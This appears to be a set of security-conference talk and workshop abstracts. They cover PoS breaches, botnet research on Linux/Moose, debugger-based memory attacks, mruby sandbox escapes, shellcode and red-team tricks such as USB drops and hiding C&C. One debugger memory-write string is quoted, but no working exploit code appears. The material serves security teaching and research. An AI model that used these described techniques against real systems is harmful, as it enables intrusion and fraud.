Hackers try to find the easiest ways to achieve the most impact. When it comes to credit card fraud, compromising Point of Sale (PoS) systems is the latest trend. The presenters will share their experience on how attackers can exploit both technical and policy gaps to breach organizations. This talk will cover approaches to physical security, kiosk breakouts, and the extraction of sensitive data. It’s laced with real-life examples, including a detailed discussion of recently disclosed critical vulnerabilities in Oracle’s hotel management platform. Continue reading…
BearSSL is a novel SSL/TLS library optimised for constrained systems, aiming at small code footprint and low RAM usage. The talk is about presenting the library in its context, and delving into what makes a good SSL implementation and how BearSSL does it. Continue reading…
For this talk, a criminologist and a security researcher teamed up to hunt a large-scale botnet dubbed Linux/Moose that conducts social media fraud. Linux/Moose has stealth features and runs only on embedded systems such as consumer routers or Internet of Things (IoT) devices. Using honeypots set up across the world, we managed to get virtual routers infected to learn how this botnet spread and operated. We performed a large-scale HTTPS man-in-the-middle attack on several honeypots over the course of several months decrypting the bots’ proxy traffic. This gave us an impressive amount of information on the botnet’s activities on social networks: the name of the fake accounts it uses, its modus operandi to conduct social media fraud and the identification of its consumers, companies and individuals.
This presentation will be of interest to a wide audience. First, it will present the elaborate methodology we used to infect custom honeypots with Linux/Moose and led to contributions to the open-source Cowrie Honeypot Project. Second, it will describe the technical details behind the man-in-the-middle attack conducted to decrypt the traffic. The talk will further increase its draw by placing the botnet’s activities within a larger-scope: the illicit market for social media fraud. With the data gathered from the decrypted traffic and open-source research, market dynamics behind the sale of social media fraud will be presented, allowing an overview of the botnet’s potential profitability. Overall, this research elevates the standards of botnet studies as it not only investigates how a botnet is built, but also what drives it.
Imagine being attacked by legitimate software tools that cannot be detected by usual defender tools.
How bad could it be to be attacked by malicious threat actors only sending bytes to be read and bytes to be written in order to achieve advanced attacks?
The most dangerous threat is the one you can’t see. At a time when it is not obvious to detect memory attacks using API like VirtualAlloc, what would be worse than having to detect something like “f 0xffffe001`0c79ebe8+0x8 L4 0xe8 0xcb 0x04 0x10”?
We will be able to demonstrate that we can achieve every kind of attacks you can imagine using only PowerShell and a Microsoft Signed Debugger. We can retrieve passwords from the userland memory, execute shellcode by dynamically parsing loaded PE or attack the kernel achieving advanced persistence inside any system. Continue reading…
As banking fraud researchers, we take part in a never-ending chase after new configurations of banking malware. We strive to have the upper hand, by figuring out where the configurations are hidden and how they are encrypted. It can be quite thrilling, when a new version of the malware is released, encryption had changed, and the configuration must be decrypted before time runs out. We’d like to share this thrill, and teach useful skills that may come in handy when dealing with a variety of custom encryption algorithms used by malware authors. In many cases, cracking an encryption requires advanced skills in math and reverse engineering. But quite often malware authors create custom algorithm for data formatting and encryption, which can be overcome using a more intuitive skillset and methods. A great example is the encryption used by Dridex, which we shall use as a case study. In this workshop, lecturing will be kept to the necessary minimum and the major part of it will be dedicated to a hands-on guided process of analyzing raw encrypted data. We shall study the way it is encrypted, eventually formulating a simple method of decryption. Participants will gain an understanding of the process of researching an actual encryption method, acquire basic tools for addressing encrypted data of unknown format and enjoy the thrill of a live challenge.
This workshop is an hands-on approach to introduces the participants to the basic exploitation techniques of scripting engines. The exercise will focus on real world examples around mruby, a lightweight Ruby interpreter easily customizable to limit or completely remove I/O operation and act as a sandbox. Through successful exploitation, the participants will be able to execute arbitrary native code from a ruby script, bypassing any restriction to the ruby APIs.
The participants will be guided to look for common vulnerability patterns, successfully set up their exploit and ultimately, get control of the instruction pointer to escape the mruby virtual machine. Finally, some defensive measure will be seen to harden the vulnerable engine and limit the side-effects of a successful exploit.
The workshop will begin with an overview of the various detection and automation mechanisms available in LimaCharlie.
Afterwards we will create Detections and Hunters for LimaCharlie that will automate the detection and investigation of specific malware samples (provided for the Workshop, attendees can also bring their own). Continue reading…
The purpose of this workshop is to familiarize participants with assembly language. At the end of the workshop, participants will be able to understand shellcode and optimize it to avoid null bytes or blacklisted characters.
The workshop will show basics of x86_64 assembly using Intel syntax.
Integrating vulnerability scanning results into one’s security ecosystem involves a serious hidden challenge which results in heinous consequences, thereby killing your InfoSec program. This session shares clues on this challenge, step by step, in the form of a murder mystery game, and ultimately reveals the culprit as well as strategies to overcome it. Come participate, play, and interact! Try to guess “who-dunnit,” and learn how to avoid future similar InfoSec crimes. Continue reading…
Who said that you need to be elite to be a good red teamer?
This presentation focuses on simple, easy hacks that can change the result of a red team assessment.
The 30 minute talk will cover improvements on the age old classic of dropping usb keys (35% increase in payload delivery!); how to reduce your C&C discoverabiltiy; techniques for leveraging Outlook against your victim to improve social engineering and other very simple tricks. By the end of the presentation, audience should be inspired to build upon techniques discussed in the talk and feel more confident in doing red team engagements. Continue reading…